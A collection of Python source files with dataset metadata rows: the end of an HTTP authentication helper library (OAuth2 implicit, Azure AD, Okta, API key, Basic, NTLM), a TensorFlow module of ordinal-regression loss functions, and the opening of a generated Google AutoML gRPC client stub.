* nonce: Refer to http://openid.net/specs/openid-connect-core-1_0.html#IDToken for more details
* prompt: none to avoid prompting the user if a session is already opened.
"""
self.authorization_url = authorization_url
if not self.authorization_url:
raise Exception('Authorization URL is mandatory.')
self.kwargs = kwargs
extra_parameters = dict(kwargs)
self.header_name = extra_parameters.pop('header_name', None) or 'Authorization'
self.header_value = extra_parameters.pop('header_value', None) or 'Bearer {token}'
if '{token}' not in self.header_value:
raise Exception('header_value parameter must contains {token}.')
redirect_uri_endpoint = extra_parameters.pop('redirect_uri_endpoint', None) or ''
redirect_uri_port = int(extra_parameters.pop('redirect_uri_port', None) or 5000)
# Time is expressed in seconds
timeout = int(extra_parameters.pop('timeout', None) or 60)
# Time is expressed in milliseconds
success_display_time = int(extra_parameters.pop('success_display_time', None) or 1)
# Time is expressed in milliseconds
failure_display_time = int(extra_parameters.pop('failure_display_time', None) or 5000)
response_type = _get_query_parameter(self.authorization_url, 'response_type')
if response_type:
extra_parameters.pop('response_type', None) # Ensure provided value will not be overridden
else:
# As described in https://tools.ietf.org/html/rfc6749#section-4.2.1
response_type = extra_parameters.setdefault('response_type', 'token')
# As described in https://tools.ietf.org/html/rfc6749#section-4.2.2
token_field_name = extra_parameters.pop('token_field_name', None)
if not token_field_name:
token_field_name = 'id_token' if 'id_token' == response_type else 'access_token'
redirect_uri = 'http://localhost:{0}/{1}'.format(redirect_uri_port, redirect_uri_endpoint)
authorization_url_without_nonce = _add_parameters(self.authorization_url, extra_parameters)
authorization_url_without_nonce, nonce = _pop_parameter(authorization_url_without_nonce, 'nonce')
self.state = sha512(authorization_url_without_nonce.encode('unicode_escape')).hexdigest()
custom_parameters = {'state': self.state, 'redirect_uri': redirect_uri}
if nonce:
custom_parameters['nonce'] = nonce
grant_url = _add_parameters(authorization_url_without_nonce, custom_parameters)
self.grant_details = oauth2_authentication_responses_server.GrantDetails(
grant_url,
token_field_name,
timeout,
success_display_time,
failure_display_time,
redirect_uri_port
)
def __call__(self, r):
token = OAuth2.token_cache.get_token(
self.state, oauth2_authentication_responses_server.request_new_grant, self.grant_details
)
r.headers[self.header_name] = self.header_value.format(token=token)
return r
def __add__(self, other):
if isinstance(other, Auths):
return Auths(self, *other.authentication_modes)
return Auths(self, other)
def __str__(self):
addition_args_str = ', '.join(["{0}='{1}'".format(key, value) for key, value in self.kwargs.items()])
return "OAuth2Implicit('{0}', {1})".format(self.authorization_url, addition_args_str)
class AzureActiveDirectoryImplicit(OAuth2Implicit):
"""
Describes an Azure Active Directory (OAuth 2) "Access Token" requests authentication.
https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens
"""
def __init__(self, tenant_id, client_id, **kwargs):
"""
:param tenant_id: Microsoft Tenant Identifier (formatted as an Universal Unique Identifier)
:param client_id: Microsoft Application Identifier (formatted as an Universal Unique Identifier)
:param response_type: Value of the response_type query parameter.
token by default.
:param token_field_name: Name of the expected field containing the token.
access_token by default.
:param nonce: Refer to http://openid.net/specs/openid-connect-core-1_0.html#IDToken for more details
(formatted as an Universal Unique Identifier - UUID). Use a newly generated UUID by default.
:param redirect_uri_endpoint: Custom endpoint that will be used as redirect_uri the following way:
http://localhost:<redirect_uri_port>/<redirect_uri_endpoint>. Default value is to redirect on / (root).
:param redirect_uri_port: The port on which the server listening for the OAuth 2 token will be started.
Listen on port 5000 by default.
:param timeout: Maximum amount of seconds to wait for a token to be received once requested.
Wait for 1 minute by default.
:param success_display_time: In case a token is successfully received,
this is the maximum amount of milliseconds the success page will be displayed in your browser.
Display the page for 1 millisecond by default.
:param failure_display_time: In case received token is not valid,
this is the maximum amount of milliseconds the failure page will be displayed in your browser.
Display the page for 5 seconds by default.
:param header_name: Name of the header field used to send token.
Token will be sent in Authorization header field by default.
:param header_value: Format used to send the token value.
"{token}" must be present as it will be replaced by the actual token.
Token will be sent as "Bearer {token}" by default.
:param kwargs: all additional authorization parameters that should be put as query parameter
in the authorization URL.
Usual parameters are:
* prompt: none to avoid prompting the user if a session is already opened.
"""
OAuth2Implicit.__init__(
self,
'https://login.microsoftonline.com/{0}/oauth2/authorize'.format(tenant_id),
client_id=client_id,
nonce=kwargs.pop('nonce', None) or str(uuid.uuid4()),
**kwargs
)
class AzureActiveDirectoryImplicitIdToken(OAuth2Implicit):
"""
Describes an Azure Active Directory (OpenID Connect) "ID Token" requests authentication.
https://docs.microsoft.com/en-us/azure/active-directory/develop/id-tokens
"""
def __init__(self, tenant_id, client_id, **kwargs):
"""
:param tenant_id: Microsoft Tenant Identifier (formatted as an Universal Unique Identifier)
:param client_id: Microsoft Application Identifier (formatted as an Universal Unique Identifier)
:param response_type: Value of the response_type query parameter.
id_token by default.
:param token_field_name: Name of the expected field containing the token.
id_token by default.
:param nonce: Refer to http://openid.net/specs/openid-connect-core-1_0.html#IDToken for more details
(formatted as an Universal Unique Identifier - UUID). Use a newly generated UUID by default.
:param redirect_uri_endpoint: Custom endpoint that will be used as redirect_uri the following way:
http://localhost:<redirect_uri_port>/<redirect_uri_endpoint>. Default value is to redirect on / (root).
:param redirect_uri_port: The port on which the server listening for the OAuth 2 token will be started.
Listen on port 5000 by default.
:param timeout: Maximum amount of seconds to wait for a token to be received once requested.
Wait for 1 minute by default.
:param success_display_time: In case a token is successfully received,
this is the maximum amount of milliseconds the success page will be displayed in your browser.
Display the page for 1 millisecond by default.
:param failure_display_time: In case received token is not valid,
this is the maximum amount of milliseconds the failure page will be displayed in your browser.
Display the page for 5 seconds by default.
:param header_name: Name of the header field used to send token.
Token will be sent in Authorization header field by default.
:param header_value: Format used to send the token value.
"{token}" must be present as it will be replaced by the actual token.
Token will be sent as "Bearer {token}" by default.
:param kwargs: all additional authorization parameters that should be put as query parameter
in the authorization URL.
Usual parameters are:
* prompt: none to avoid prompting the user if a session is already opened.
"""
OAuth2Implicit.__init__(
self,
'https://login.microsoftonline.com/{0}/oauth2/authorize'.format(tenant_id),
client_id=client_id,
response_type=kwargs.pop('response_type', 'id_token'),
token_field_name=kwargs.pop('token_field_name', 'id_token'),
nonce=kwargs.pop('nonce', None) or str(uuid.uuid4()),
**kwargs
)
class OktaImplicit(OAuth2Implicit):
"""
Describes an OKTA (OAuth 2) "Access Token" implicit flow requests authentication.
"""
def __init__(self, instance, client_id, **kwargs):
"""
:param instance: OKTA instance (like "testserver.okta-emea.com")
:param client_id: Microsoft Application Identifier (formatted as an Universal Unique Identifier)
:param response_type: Value of the response_type query parameter.
token by default.
:param token_field_name: Name of the expected field containing the token.
access_token by default.
:param nonce: Refer to http://openid.net/specs/openid-connect-core-1_0.html#IDToken for more details
(formatted as an Universal Unique Identifier - UUID). Use a newly generated UUID by default.
:param authorization_server: OKTA authorization server
:param scope: Scope parameter sent in query. Can also be a list of scopes.
Request ['openid', 'profile', 'email'] by default.
:param redirect_uri_endpoint: Custom endpoint that will be used as redirect_uri the following way:
http://localhost:<redirect_uri_port>/<redirect_uri_endpoint>. Default value is to redirect on / (root).
:param redirect_uri_port: The port on which the server listening for the OAuth 2 token will be started.
Listen on port 5000 by default.
:param timeout: Maximum amount of seconds to wait for a token to be received once requested.
Wait for 1 minute by default.
:param success_display_time: In case a token is successfully received,
this is the maximum amount of milliseconds the success page will be displayed in your browser.
Display the page for 1 millisecond by default.
:param failure_display_time: In case received token is not valid,
this is the maximum amount of milliseconds the failure page will be displayed in your browser.
Display the page for 5 seconds by default.
:param header_name: Name of the header field used to send token.
Token will be sent in Authorization header field by default.
:param header_value: Format used to send the token value.
"{token}" must be present as it will be replaced by the actual token.
Token will be sent as "Bearer {token}" by default.
:param kwargs: all additional authorization parameters that should be put as query parameter
in the authorization URL.
Usual parameters are:
* prompt: none to avoid prompting the user if a session is already opened.
"""
authorization_server = kwargs.pop('authorization_server', None)
scopes = kwargs.pop('scope', None) or ['openid', 'profile', 'email']
kwargs['scope'] = ' '.join(scopes) if isinstance(scopes, list) else scopes
OAuth2Implicit.__init__(
self,
'https://{okta_instance}/oauth2{okta_auth_server}/v1/authorize'.format(
okta_instance=instance,
okta_auth_server="/" + authorization_server if authorization_server else ""
),
client_id=client_id,
nonce=kwargs.pop('nonce', None) or str(uuid.uuid4()),
**kwargs
)
class OktaImplicitIdToken(OAuth2Implicit):
"""
Describes an OKTA (OpenID Connect) "ID Token" implicit flow requests authentication.
"""
def __init__(self, instance, client_id, **kwargs):
"""
:param instance: OKTA instance (like "testserver.okta-emea.com")
:param client_id: Microsoft Application Identifier (formatted as an Universal Unique Identifier)
:param response_type: Value of the response_type query parameter.
id_token by default.
:param token_field_name: Name of the expected field containing the token.
id_token by default.
:param nonce: Refer to http://openid.net/specs/openid-connect-core-1_0.html#IDToken for more details
(formatted as an Universal Unique Identifier - UUID). Use a newly generated UUID by default.
:param authorization_server: OKTA authorization server
:param scope: Scope parameter sent in query. Can also be a list of scopes.
Request ['openid', 'profile', 'email'] by default.
:param redirect_uri_endpoint: Custom endpoint that will be used as redirect_uri the following way:
http://localhost:<redirect_uri_port>/<redirect_uri_endpoint>. Default value is to redirect on / (root).
:param redirect_uri_port: The port on which the server listening for the OAuth 2 token will be started.
Listen on port 5000 by default.
:param timeout: Maximum amount of seconds to wait for a token to be received once requested.
Wait for 1 minute by default.
:param success_display_time: In case a token is successfully received,
this is the maximum amount of milliseconds the success page will be displayed in your browser.
Display the page for 1 millisecond by default.
:param failure_display_time: In case received token is not valid,
this is the maximum amount of milliseconds the failure page will be displayed in your browser.
Display the page for 5 seconds by default.
:param header_name: Name of the header field used to send token.
Token will be sent in Authorization header field by default.
:param header_value: Format used to send the token value.
"{token}" must be present as it will be replaced by the actual token.
Token will be sent as "Bearer {token}" by default.
:param kwargs: all additional authorization parameters that should be put as query parameter
in the authorization URL.
Usual parameters are:
* prompt: none to avoid prompting the user if a session is already opened.
"""
authorization_server = kwargs.pop('authorization_server', None)
scopes = kwargs.pop('scope', None) or ['openid', 'profile', 'email']
kwargs['scope'] = ' '.join(scopes) if isinstance(scopes, list) else scopes
OAuth2Implicit.__init__(
self,
'https://{okta_instance}/oauth2{okta_auth_server}/v1/authorize'.format(
okta_instance=instance,
okta_auth_server="/" + authorization_server if authorization_server else ""
),
client_id=client_id,
response_type=kwargs.pop('response_type', 'id_token'),
token_field_name=kwargs.pop('token_field_name', 'id_token'),
nonce=kwargs.pop('nonce', None) or str(uuid.uuid4()),
**kwargs
)
class HeaderApiKey(requests.auth.AuthBase):
"""Describes an API Key requests authentication."""
def __init__(self, api_key, header_name=None):
"""
:param api_key: The API key that will be sent.
:param header_name: Name of the header field. "X-API-Key" by default.
"""
self.api_key = api_key
if not api_key:
raise Exception('API Key is mandatory.')
self.header_name = header_name or 'X-API-Key'
def __call__(self, r):
r.headers[self.header_name] = self.api_key
return r
def __add__(self, other):
if isinstance(other, Auths):
return Auths(self, *other.authentication_modes)
return Auths(self, other)
def __str__(self):
return "HeaderApiKey('{0}', '{1}')".format(self.api_key, self.header_name)
class QueryApiKey(requests.auth.AuthBase):
"""Describes an API Key requests authentication."""
def __init__(self, api_key, query_parameter_name=None):
"""
:param api_key: The API key that will be sent.
:param query_parameter_name: Name of the query parameter. "api_key" by default.
"""
self.api_key = api_key
if not api_key:
raise Exception('API Key is mandatory.')
self.query_parameter_name = query_parameter_name or 'api_key'
def __call__(self, r):
r.url = _add_parameters(r.url, {self.query_parameter_name: self.api_key})
return r
def __add__(self, other):
if isinstance(other, Auths):
return Auths(self, *other.authentication_modes)
return Auths(self, other)
def __str__(self):
return "QueryApiKey('{0}', '{1}')".format(self.api_key, self.query_parameter_name)
class Basic(requests.auth.HTTPBasicAuth):
"""Describes a basic requests authentication."""
def __init__(self, username, password):
requests.auth.HTTPBasicAuth.__init__(self, username, password)
def __add__(self, other):
if isinstance(other, Auths):
return Auths(self, *other.authentication_modes)
return Auths(self, other)
def __str__(self):
return "Basic('{0}', '{1}')".format(self.username, self.password)
class NTLM:
"""Describes a NTLM requests authentication."""
def __init__(self, username=None, password=None):
"""
:param username: Mandatory if requests_negotiate_sspi module is not installed.
:param password: Mandatory if requests_negotiate_sspi module is not installed.
"""
self.username = username
self.password = password
if not username and not password:
try:
import requests_negotiate_sspi
self.auth = requests_negotiate_sspi.HttpNegotiateAuth()
except ImportError:
raise Exception('NTLM authentication requires requests_negotiate_sspi module.')
else:
if not username:
raise Exception('NTLM authentication requires "username" to be provided in security_details.')
if not password:
raise Exception('NTLM authentication requires "password" to be provided in security_details.')
try:
import requests_ntlm
self.auth = requests_ntlm.HttpNtlmAuth(username, password)
except ImportError:
raise Exception('NTLM authentication requires requests_ntlm module.')
def __call__(self, r):
self.auth.__call__(r)
return r
def __add__(self, other):
if isinstance(other, Auths):
return Auths(self, *other.authentication_modes)
return Auths(self, other)
def __str__(self):
if self.username and self.password:
return "NTLM('{0}', '{1}')".format(self.username, self.password)
return "NTLM()"
class Auths(requests.auth.AuthBase):
"""Authentication using multiple authentication methods."""
def __init__(self, *authentication_modes):
warnings.warn("Auths class will be removed in the future. Use + instead.", DeprecationWarning)
self.authentication_modes = authentication_modes
def __call__(self, r):
for authentication_mode in self.authentication_modes:
authentication_mode.__call__(r)
return r
def __add__(self, other):
if isinstance(other, Auths):
return Auths(*self.authentication_modes, *other.authentication_modes)
return Auths(*self.authentication_modes, other)
def __str__(self):
return "Auths(" + ", ".join(map(str, self.authentication_modes)) + ")"
| 48.895433 | 118 | 0.684496 | 5,325 | 40,681 | 5.054836 | 0.059718 | 0.022402 | 0.033288 | 0.014117 | 0.851841 | 0.829662 | 0.813835 | 0.799755 | 0.785786 | 0.776312 | 0 | 0.009381 | 0.234827 | 40,681 | 831 | 119 | 48.954272 | 0.855339 | 0.437698 | 0 | 0.635443 | 0 | 0 | 0.1208 | 0.009222 | 0 | 0 | 0 | 0.001203 | 0 | 1 | 0.116456 | false | 0.073418 | 0.037975 | 0.010127 | 0.301266 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
7696fc5c075bea5f42c57d5f76016523e4497981 | 16,498 | py | Python | src/condor_tensorflow/loss.py | GarrettJenkinson/condor_tensorflow | db715a2db6a5c0dbf610f5ad82cec16e2ab3d3d8 | [
"Apache-2.0"
] | 9 | 2021-10-31T16:39:35.000Z | 2022-02-19T17:51:07.000Z | src/condor_tensorflow/loss.py | GarrettJenkinson/condor_tensorflow | db715a2db6a5c0dbf610f5ad82cec16e2ab3d3d8 | [
"Apache-2.0"
] | 4 | 2022-01-01T19:52:55.000Z | 2022-02-16T00:38:40.000Z | src/condor_tensorflow/loss.py | GarrettJenkinson/condor_tensorflow | db715a2db6a5c0dbf610f5ad82cec16e2ab3d3d8 | [
"Apache-2.0"
] | 4 | 2021-10-31T17:50:29.000Z | 2022-02-11T02:54:47.000Z | from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
import tensorflow as tf
from .activations import ordinal_softmax
# The outer function is a constructor to create a loss function using a
# certain number of classes.
class CondorNegLogLikelihood(tf.keras.losses.Loss):
def __init__(self,
from_type="ordinal_logits",
name="ordinal_nll",
**kwargs):
""" Negative log likelihood loss designed for ordinal outcomes.
Parameters
----------
from_type: one of "ordinal_logits" (default), or "probs".
Ordinal logits are the output of a Dense(num_classes-1) layer with no activation.
(Not yet implemented) Probs are the probability outputs of a softmax or ordinal_softmax layer.
Returns
----------
loss: tf.Tensor, shape=(num_samples,)
Loss vector, note that tensorflow will reduce it to a single number
automatically.
"""
self.from_type = from_type
super().__init__(name=name, **kwargs)
# Modifed from: https://github.com/tensorflow/tensorflow/blob/6dcd6fcea73ad613e78039bd1f696c35e63abb32/tensorflow/python/ops/nn_impl.py#L112-L148
def ordinal_loss(self, logits, labels, name=None):
""" Negative log likelihood loss function designed for ordinal outcomes.
Parameters
----------
logits: tf.Tensor, shape=(num_samples,num_classes-1)
Logit output of the final Dense(num_classes-1) layer.
levels: tf.Tensor, shape=(num_samples, num_classes-1)
Encoded lables provided by CondorOrdinalEncoder.
Returns
----------
loss: tf.Tensor, shape=(num_samples,)
Loss vector, note that tensorflow will reduce it to a single number
automatically.
"""
with ops.name_scope(name, "logistic_loss", [logits, labels]) as name:
if isinstance(logits,tf.Tensor):
logits = tf.cast(logits,dtype=tf.float32,name="logits")
else:
logits = ops.convert_to_tensor(logits, dtype=tf.float32,name="logits")
if isinstance(labels,tf.Tensor):
labs = tf.cast(labels,dtype=tf.float32,name="labs")
piLab = tf.concat([tf.ones((tf.shape(labs)[0],1)),labs[:,:-1]],
axis=1,name="piLab")
else:
labs = ops.convert_to_tensor(labels, dtype=tf.float32,name="labs")
piLab = tf.concat([tf.ones((tf.shape(labs)[0],1)),labs[:,:-1]],
axis=1,name="piLab")
# The logistic loss formula from above is
# x - x * z + log(1 + exp(-x))
# For x < 0, a more numerically stable formula is
# -x * z + log(1 + exp(x))
# Note that these two expressions can be combined into the following:
# max(x, 0) - x * z + log(1 + exp(-abs(x)))
# To allow computing gradients at zero, we define custom versions of max and
# abs functions.
zeros = array_ops.zeros_like(logits, dtype=logits.dtype)
cond = (logits >= zeros)
cond2 = (piLab > zeros)
relu_logits = array_ops.where(cond, logits, zeros)
neg_abs_logits = array_ops.where(cond, -logits, logits)
temp = math_ops.add(relu_logits - logits * labs,
math_ops.log1p(math_ops.exp(neg_abs_logits)))
return tf.math.reduce_sum(array_ops.where(cond2, temp, zeros),
axis=1,name=name)
# Following https://www.tensorflow.org/api_docs/python/tf/keras/losses/Loss
def call(self, y_true, y_pred):
# Ensure that y_true is the same type as y_pred (presumably a float).
y_pred = tf.convert_to_tensor(y_pred)
y_true = tf.cast(y_true, y_pred.dtype)
# get number of classes
num_classes = tf.shape(y_pred)[1]+1
# we are not sparse here, so labels are encoded already
tf_levels = y_true
if self.from_type == "ordinal_logits":
return self.ordinal_loss(y_pred, tf_levels)
elif self.from_type == "probs":
raise Exception("not yet implemented")
elif self.from_type == "logits":
raise Exception("not yet implemented")
else:
raise Exception("Unknown from_type value " + self.from_type +
" in CondorNegLogLikelihood()")
def get_config(self):
base_config = super().get_config()
config = {
"from_type": self.from_type,
}
return {**base_config, **config}
# The outer function is a constructor to create a loss function using a
# certain number of classes.
class SparseCondorNegLogLikelihood(CondorNegLogLikelihood):
def __init__(self,
from_type="ordinal_logits",
name="ordinal_negLogLikeloss",
**kwargs):
""" Negative log likelihood loss designed for ordinal outcomes.
Parameters
----------
from_type: one of "ordinal_logits" (default), or "probs".
Ordinal logits are the output of a Dense(num_classes-1) layer with no activation.
(Not yet implemented) Probs are the probability outputs of a softmax or ordinal_softmax layer.
Returns
----------
loss: tf.Tensor, shape=(num_samples,)
Loss vector, note that tensorflow will reduce it to a single number
automatically.
"""
super().__init__(name=name,
from_type=from_type,
**kwargs)
def label_to_levels(self, label):
# Original code that we are trying to replicate:
# levels = [1] * label + [0] * (self.num_classes - 1 - label)
label_vec = tf.repeat(1, tf.cast(tf.squeeze(label), tf.int32))
# This line requires that label values begin at 0. If they start at a higher
# value it will yield an error.
num_zeros = self.num_classes - 1 - tf.cast(tf.squeeze(label), tf.int32)
zero_vec = tf.zeros(shape=(num_zeros), dtype=tf.int32)
levels = tf.concat([label_vec, zero_vec], axis=0)
return tf.cast(levels, tf.float32)
# Following https://www.tensorflow.org/api_docs/python/tf/keras/losses/Loss
def call(self, y_true, y_pred):
# Ensure that y_true is the same type as y_pred (presumably a float).
y_pred = tf.convert_to_tensor(y_pred)
y_true = tf.cast(y_true, y_pred.dtype)
# get number of classes
self.num_classes = tf.shape(y_pred)[1]+1
# Convert each true label to a vector of ordinal level indicators.
tf_levels = tf.map_fn(self.label_to_levels, y_true)
if self.from_type == "ordinal_logits":
return self.ordinal_loss(y_pred, tf_levels)
elif self.from_type == "probs":
raise Exception("not yet implemented")
elif self.from_type == "logits":
raise Exception("not yet implemented")
else:
raise Exception("Unknown from_type value " + self.from_type +
" in SparseCondorNegLogLikelihood()")
class CondorOrdinalCrossEntropy(tf.keras.losses.Loss):
def __init__(self,
importance_weights=None,
from_type="ordinal_logits",
name="ordinal_crossent",
**kwargs):
""" Cross-entropy loss designed for ordinal outcomes.
Parameters
----------
importance_weights: tf or np array of floats, shape(numclasses-1,)
(Optional) importance weights for each binary classification task.
from_type: one of "ordinal_logits" (default), or "probs".
Ordinal logits are the output of a Dense(num_classes-1) layer with no activation.
(Not yet implemented) Probs are the probability outputs of a softmax or ordinal_softmax layer.
Returns
----------
loss: tf.Tensor, shape=(num_samples,)
Loss vector, note that tensorflow will reduce it to a single number
automatically.
"""
self.importance_weights = importance_weights
self.from_type = from_type
super().__init__(name=name, **kwargs)
def ordinal_loss(self, logits, levels, importance):
""" Cross-entropy loss function designed for ordinal outcomes.
Parameters
----------
logits: tf.Tensor, shape=(num_samples,num_classes-1)
Logit output of the final Dense(num_classes-1) layer.
levels: tf.Tensor, shape=(num_samples, num_classes-1)
Encoded lables provided by CondorOrdinalEncoder.
importance_weights: tf or np array of floats, shape(numclasses-1,)
Importance weights for each binary classification task.
Returns
----------
loss: tf.Tensor, shape=(num_samples,)
Loss vector, note that tensorflow will reduce it to a single number
automatically.
"""
logprobs = tf.math.cumsum(tf.math.log_sigmoid(logits), axis=1)
eps = tf.keras.backend.epsilon()
val = (-tf.reduce_sum(importance * (logprobs * levels + \
(tf.math.log(1 - tf.math.exp(logprobs) + eps) * (1 - levels))), axis=1))
return val
# Following https://www.tensorflow.org/api_docs/python/tf/keras/losses/Loss
def call(self, y_true, y_pred):
# Ensure that y_true is the same type as y_pred (presumably a float).
y_pred = tf.convert_to_tensor(y_pred)
y_true = tf.cast(y_true, y_pred.dtype)
# get number of classes
num_classes = tf.shape(y_pred)[1]+1
# we are not sparse here, so labels are encoded already
tf_levels = y_true
if self.importance_weights is None:
importance_weights = tf.ones(num_classes-1,
dtype=tf.float32)
else:
importance_weights = tf.cast(
self.importance_weights, dtype=tf.float32)
if self.from_type == "ordinal_logits":
return self.ordinal_loss(y_pred, tf_levels, importance_weights)
elif self.from_type == "probs":
raise Exception("not yet implemented")
elif self.from_type == "logits":
raise Exception("not yet implemented")
else:
raise Exception("Unknown from_type value " + self.from_type +
" in CondorOrdinalCrossEntropy()")
def get_config(self):
base_config = super().get_config()
config = {
"importance_weights": self.importance_weights,
"from_type": self.from_type,
}
return {**base_config, **config}
# The outer function is a constructor to create a loss function using a
# certain number of classes.
class SparseCondorOrdinalCrossEntropy(CondorOrdinalCrossEntropy):
def __init__(self,
importance_weights=None,
from_type="ordinal_logits",
name="ordinal_crossent",
**kwargs):
""" Cross-entropy loss designed for ordinal outcomes.
Parameters
----------
importance_weights: tf or np array of floats, shape(numclasses-1,)
(Optional) importance weights for each binary classification task.
from_type: one of "ordinal_logits" (default), or "probs".
Ordinal logits are the output of a Dense(num_classes-1) layer with no activation.
(Not yet implemented) Probs are the probability outputs of a softmax or ordinal_softmax layer.
Returns
----------
loss: tf.Tensor, shape=(num_samples,)
Loss vector, note that tensorflow will reduce it to a single number
automatically.
"""
super().__init__(name=name,
importance_weights=importance_weights,
from_type=from_type,
**kwargs)
def label_to_levels(self, label):
# Original code that we are trying to replicate:
# levels = [1] * label + [0] * (self.num_classes - 1 - label)
label_vec = tf.repeat(1, tf.cast(tf.squeeze(label), tf.int32))
# This line requires that label values begin at 0. If they start at a higher
# value it will yield an error.
num_zeros = self.num_classes - 1 - tf.cast(tf.squeeze(label), tf.int32)
zero_vec = tf.zeros(shape=(num_zeros), dtype=tf.int32)
levels = tf.concat([label_vec, zero_vec], axis=0)
return tf.cast(levels, tf.float32)
# Following https://www.tensorflow.org/api_docs/python/tf/keras/losses/Loss
def call(self, y_true, y_pred):
# Ensure that y_true is the same type as y_pred (presumably a float).
y_pred = tf.convert_to_tensor(y_pred)
y_true = tf.cast(y_true, y_pred.dtype)
# get number of classes
self.num_classes = tf.shape(y_pred)[1]+1
# Convert each true label to a vector of ordinal level indicators.
tf_levels = tf.map_fn(self.label_to_levels, y_true)
if self.importance_weights is None:
importance_weights = tf.ones(
self.num_classes - 1, dtype=tf.float32)
else:
importance_weights = tf.cast(
self.importance_weights, dtype=tf.float32)
if self.from_type == "ordinal_logits":
return self.ordinal_loss(y_pred, tf_levels, importance_weights)
elif self.from_type == "probs":
raise Exception("not yet implemented")
elif self.from_type == "logits":
raise Exception("not yet implemented")
else:
raise Exception("Unknown from_type value " + self.from_type +
" in CondorOrdinalCrossEntropy()")
class OrdinalEarthMoversDistance(tf.keras.losses.Loss):
"""Computes earth movers distance for ordinal labels."""
def __init__(self, name="earth_movers_distance",
**kwargs):
"""Creates a `OrdinalEarthMoversDistance` instance."""
super().__init__(name=name, **kwargs)
def call(self, y_true, y_pred):
"""Computes mean absolute error for ordinal labels.
Args:
y_true: Cumulatiuve logits from CondorOrdinal layer.
y_pred: CondorOrdinal Encoded Labels.
"""
# Ensure that y_true is the same type as y_pred (presumably a float).
y_pred = tf.convert_to_tensor(y_pred)
# basic setup
cum_probs = ordinal_softmax(y_pred)
num_classes = tf.shape(cum_probs)[1]
y_true = tf.cast(tf.reduce_sum(y_true, axis=1), y_pred.dtype)
# remove all dimensions of size 1 (e.g., from [[1], [2]], to [1, 2])
#y_true = tf.squeeze(y_true)
y_dist = tf.map_fn(
fn=lambda y: tf.abs(
y - tf.range(num_classes,dtype=y_pred.dtype)),
elems=y_true)
vals = tf.reduce_sum(tf.math.multiply(y_dist,cum_probs),axis=1)
return vals
def get_config(self):
"""Returns the serializable config of the metric."""
base_config = super().get_config()
return {**base_config}
class SparseOrdinalEarthMoversDistance(OrdinalEarthMoversDistance):
"""Computes earth movers distance for ordinal labels."""
def __init__(self, **kwargs):
"""Creates a `SparseOrdinalEarthMoversDistance` instance."""
super().__init__(**kwargs)
def call(self, y_true, y_pred):
"""Computes mean absolute error for ordinal labels.
Args:
y_true: Cumulatiuve logits from CondorOrdinal layer.
y_pred: Sparse Labels with values in {0,1,...,num_classes-1}
"""
# basic set up
cum_probs = ordinal_softmax(y_pred)
num_classes = tf.shape(cum_probs)[1]
y_true = tf.cast(y_true, y_pred.dtype)
# remove all dimensions of size 1 (e.g., from [[1], [2]], to [1, 2])
#y_true = tf.squeeze(y_true)
# each row has distance to true label
y_dist = tf.map_fn(
fn=lambda y: tf.abs(y - tf.range(num_classes,
dtype=y_pred.dtype)),
elems=y_true)
# pointwise multiplication by the class probabilities, row-wise sums
vals = tf.reduce_sum(tf.math.multiply(y_dist,cum_probs),axis=1)
return vals
| 38.818824 | 149 | 0.608013 | 2,073 | 16,498 | 4.671008 | 0.128799 | 0.021171 | 0.027264 | 0.01136 | 0.80378 | 0.795724 | 0.772798 | 0.764329 | 0.764329 | 0.754931 | 0 | 0.011623 | 0.290763 | 16,498 | 424 | 150 | 38.910377 | 0.815913 | 0.378349 | 0 | 0.708333 | 0 | 0 | 0.073163 | 0.015942 | 0 | 0 | 0 | 0 | 0 | 1 | 0.098958 | false | 0 | 0.114583 | 0 | 0.3125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
769ee7feaa824ee0b114159180d9f9523bf928f6 | 16,391 | py | Python | automl/google/cloud/automl_v1beta1/proto/service_pb2_grpc.py | deryrahman/google-cloud-python | b55058c4b2328fde32f29bfd8ea04708fcc578e0 | [
"Apache-2.0"
] | 1 | 2020-10-25T04:39:41.000Z | 2020-10-25T04:39:41.000Z | automl/google/cloud/automl_v1beta1/proto/service_pb2_grpc.py | deryrahman/google-cloud-python | b55058c4b2328fde32f29bfd8ea04708fcc578e0 | [
"Apache-2.0"
] | 4 | 2018-11-13T22:15:36.000Z | 2018-12-07T18:31:38.000Z | automl/google/cloud/automl_v1beta1/proto/service_pb2_grpc.py | deryrahman/google-cloud-python | b55058c4b2328fde32f29bfd8ea04708fcc578e0 | [
"Apache-2.0"
] | 1 | 2021-06-30T11:44:03.000Z | 2021-06-30T11:44:03.000Z | # Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from google.cloud.automl_v1beta1.proto import dataset_pb2 as google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_dataset__pb2
from google.cloud.automl_v1beta1.proto import model_evaluation_pb2 as google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_model__evaluation__pb2
from google.cloud.automl_v1beta1.proto import model_pb2 as google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_model__pb2
from google.cloud.automl_v1beta1.proto import service_pb2 as google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2
from google.longrunning import operations_pb2 as google_dot_longrunning_dot_operations__pb2
class AutoMlStub(object):
"""AutoML Server API.
The resource names are assigned by the server.
The server never reuses names that it has created after the resources with
those names are deleted.
An ID of a resource is the last element of the item's resource name. For
`projects/{project_id}/locations/{location_id}/datasets/{dataset_id}`, then
the id for the item is `{dataset_id}`.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.CreateDataset = channel.unary_unary(
'/google.cloud.automl.v1beta1.AutoMl/CreateDataset',
request_serializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_service__pb2.CreateDatasetRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_automl__v1beta1_dot_proto_dot_dataset__pb2.Dataset.FromString,
)
self.GetDataset = channel.unary_unary(
